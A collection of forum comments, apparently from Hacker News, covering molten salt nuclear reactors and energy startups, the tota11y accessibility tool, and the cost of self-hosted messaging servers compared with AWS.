Interestingly, a US company, Thorcon , has built a "hackable" MSR - though I dont know if it is any good.
 http://fortune.com/2015/02/02/doe-china-molten-salt-nuclear-... http://fukushimaupdate.com/thorium-molten-salt-reactors-to-g...
I don't see any future for nuclear if it doesn't fundamentally change the way it harvests the energy and when it solves the nuclear waste problem economically
I would love to work on a project like this.
Not sure what 'sama means by this, but I guess it's what I feel - government projects tend to go slow unless there's an actual, real security reason for them to go faster, in which case - like with Manhattan project - you get crazy amount of productivity and progress.
Are we talking public cost? Because that's all that matters. So far the public cost of nuclear power has been extraordinary, due to accidents and waste.
I understand that some of these startups aim to process existing waste in relatively small distributed reactors but what is the public cost of spreading a bunch of "mini" toxic waste sites around the world that remain hazardous for 100 years, instead of centrally storing it?
Plus I've read that although these mini reactors are not directly producing material that could be used in a dirty bomb, that they could be converted to do so if they fell into the wrong hands. I may be oversimplifying here, but the question again is what is the public risk of distributing atomic fuels and reactors in a manner that makes them much less secure? Would this make them more susceptible to "war hacking" and could this be the mini-reactor equivalent of a nuclear disaster?
Nuclear costs have always been about the long term public costs, not the short term $/kWh.
This is before we even consider the taxpayer cost that's gone into nuclear tech development. I wonder if there will be more public money needed to take this tech to market, even if the test reactors bear fruit.
Does anyone know the current story? Can renewables scale up fast enough? Also, does the availability problem (i.e., renewables not being available when the sun/wind are not) prevent them from having a sufficient impact? I could imagine that, even if renewables weren't always available, their use still could reduce greenhouse gas emissions enough to mitigate climate change sufficiently.
I couldn't agree more with Sam about the importance of energy for our civilization. Kudos to him for putting his efforts towards important stuff.
I have mixed, but mostly positive feelings about venture capital and energy startups. The fact is, it's a tough space. Large capital requirements, prototyping cycles often measured in years, and a low success rate. Everyone is still waiting for the energy unicorn to put Google, Uber, Yahoo, et al. to shame. And energy startups don't benefit from many of the things in SV that infotech startups do, such as ecosystem synergies and being co-located with all the new cool stuff in your industry. This is especially true with regards to one of SV's great strengths, the freedom to fail.
Where SV shines is in the short times from idea to testing. In most of the nuclear energy industry, going from idea to tested prototype can take decades. I think we all know the importance of short debugging and feedback cycles. Hirsch harped on this a few years back, and it's still a good point. Look at ITER, which were were talking about back in 1995. ITERative, it is not.
1) The teams and funding are a bit larger than they used to be. This is probably a good thing. The design turnaround time is a bit better, but not by much though. It's necessary to tweak a design once you have built it to learn from it and see what its ultimate performance can be. But it's all-too-easy to spend a year or two doing that. Do that a few times and then you're out (of money, time, your mind, what-have-you).
2) Location. There is no advantage to locating an energy company in SV except for proximity to funding (and Stanford, I suppose). We located by the NHMFL in Tallahassee. It's cheaper, and the magnet guys would moonlight for us. However, working with Tim over 3 time-zones had its challenges. I don't think we got the benefit of having a great VC as much as some of his other portfolio companies did (no complaints about him, just the distance). Some things are just hard to explain over the phone. But SV still isn't the right place. I think that there is a big opportunity for VCs to improve how they provide the value-added stuff that they do (beyond providing money) remotely, and energy is the space that needs it most. I don't know the VC job well enough to provide good suggestions, I just know there is an unmet need here.
3) Because the failure rate for startups is so high, it's important to have a decent failure path for the people involved. For software devs, SV jobs often provide a soft landing. Energy guys don't have that easily transferable skill set. So, fusion largely consists of old hands who are willing to spend 20 years ramming a single design through, and a bunch of young redshirts who are sure that they can beat the odds. When every design failure becomes a career failure, people aren't incentived to radically iterate designs quickly. Luckily for me, I learned radiation measurement and protection on-the-job (hey we have neutrons! How many neutrons? Woo hoo! Wait, oh shit!) so that skill transfered over into medical physics quite readily. But imagine what SV would look like if almost every software startup founder who failed once had left the software industry.
I wish good luck to Helion, UPower, and all the other teams fighting the good fight.
(Of course it's far better for the environment than present coal/petrol/gas/wood, and their energy initially came from the sun anyway, but it will still have some environmental impact.)
Large claims with no hard data comparisons? (eg. atomic power has major cost, density, and predictability advantages)
>There will only be one cheapest source of energy
Really? There can't be two sources at or near equilibrium?
These systems are not deployed in isolated, designer environments, but instead are deployed in complex environments. Transportation and project logistics will prefer some sources over others.
The lack of any real metric for cost or "cheapness" is a red flag. Is cost being measured in nominal dollars? Will such a thing even exist in the 22nd century?
Energy is a tiny component of modern civilization.
I built this utility with the help of two colleagues after working on accessibility at Khan Academy for a few weeks, and seeing first-hand the process of evangelizing accessibility on a dev team. Our automated tests were far from approachable (and became more annoying than helpful), so we built tota11y to make the manual testing experience more interactive and educational (we like teaching things).
I touch on this in our engineering blog 
Anyway, super thrilled to see tota11y near the top of HN this morning, and happy to answer any questions you may have.
I'm not a web developer (I do desktop/server software development), so I have no idea how or why certain pages implement this policy/style. It just seems a little arbitrary to choose a font size for your site and not allow visitors to zoom-in in case they have trouble reading the text.
While minimised, the tab could display a score like A+ - this could incentivise websites to permanently present it on their pages as a badge of pride (while ensuring visibility to any changes that degrade the score).
Secondly, if you link to the project within the maximised tab, you'll likely see greater adoption.
Very handy having things like these as bookmarks.
The script will be loaded only if an admin user is logged. So you can rest assured this will not annoy your users.
edit: Never mind, made a quick one for myself seeing that's MIT licensed https://gist.github.com/liviu-/62e8ce91b8723ef1a10a
I run a similar service but for SMS messaging that is 21cfr11 compliant. We rent a 1/4 rack with our own door/lock and throw in pretty much disposable servers as needed. It's much cheaper than doing the equivalent on AWS, and it's not that difficult to set up your own secure servers once you have a few recipes to follow.
We started it about 9 years ago before a secure service with amazon existed. Every year or two I price alternative solutions like AWS's secure service, VPCs, etc and it's always cheaper even taking account my labor to stick with our 1/4 closet. In fact, it seems they base their costs on the going rate for rack space, plus a premium for using the convenience of using their servers.
Oh, and it's funny - we have almost the same number of users and we're processing more messages per month than them, all on a old-fashioned webserver-appserver-dataserver arrangement - three servers (with fallover redunandancy not counted) and it's barely breaking a sweat.
Seems like a very low efficiency in either the hardware or the software. We run a comparable service with roughly 2 million messages per day in a 6 server dedicated cluster.